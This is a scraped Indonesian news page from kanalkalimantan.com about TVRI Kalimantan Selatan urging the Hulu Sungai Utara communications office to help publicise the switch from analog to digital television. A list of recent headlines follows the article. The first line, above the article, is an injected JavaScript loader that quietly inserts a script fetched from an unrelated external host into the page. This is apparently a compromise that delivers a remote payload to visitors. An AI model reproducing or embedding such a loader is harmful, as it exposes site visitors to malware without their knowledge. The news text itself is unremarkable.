(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Teknologi

Siaran TV Analog Berganti ke TV Digital, Ini Kata Kepala Stasiun TVRI Kalsel ke Diskominfo HSU


KANALKALIMANTAN.COM, BANJARMASIN – Plh Kepala Stasiun TVRI Kalimantan Selatan, Chandra Purnama berharap Dinas Komunikasi dan Informatika (Diskominfo) di daerah dapat turut serta menyosialisasikan terkait migrasi televisi analog ke siaran televisi digital.

Hal ini diungkapkannya saat menerima kunjungan studi Diskominfo Kabupaten Hulu Sungai Utara (HSU) ke kantor TVRI Kalsel, Sabtu (29/1/2022).

“Kendala siaran digital adalah masyarakat masih belum tahu banyak berkaitan dengan TV yang sudah digital, jadi masyarakat masih perlu diberitahu, kita juga melakukan sosialisasi kepada masyarakat mengenai siaran TV digital ini,” beber Chandra.

Menurutnya siaran TV digital menjadi keharusan yang harus dijalani nantinya, karena kabarnya semua siaran TV analog akan berganti ke digital mulai tanggal 2 November 2022.

 

Baca juga : Dipecat dari Anggota Polri, BT Minta Maaf Akui Telah Mencoreng Institusi

Menanggapi hal tersebut, Kepala Diskominfo HSU Adi Lesmana, merespon positif langkah tersebut terkait integrasi televisi analog ke siaran televisi digital oleh pemerintah dengan terus melakukan sosialisasi.

Sementara itu, Adi menyebut kedatangan ke Stasiun TVRI Kalsel ini adalah untuk meningkatkan keterampilan kerja di bidang penyiaran bagi karyawan Diskominfo HSU di bidang komunikasi dan informasi publik.

Dirinya juga mengucapkan rasa terima kasih atas bimbingan TVRI Kalsel yang memberikan ilmu pengetahuan kepada Diskominfo HSU.

“Semoga adanya kegiatan ini dapat semakin meningkatkan kemampuan baik dalam pembuatan naskah berita, kamera, editing dan penyiaran,” pungkasnya (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

44 menit ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

2 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

2 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

2 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

6 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

8 jam ago

This website uses cookies.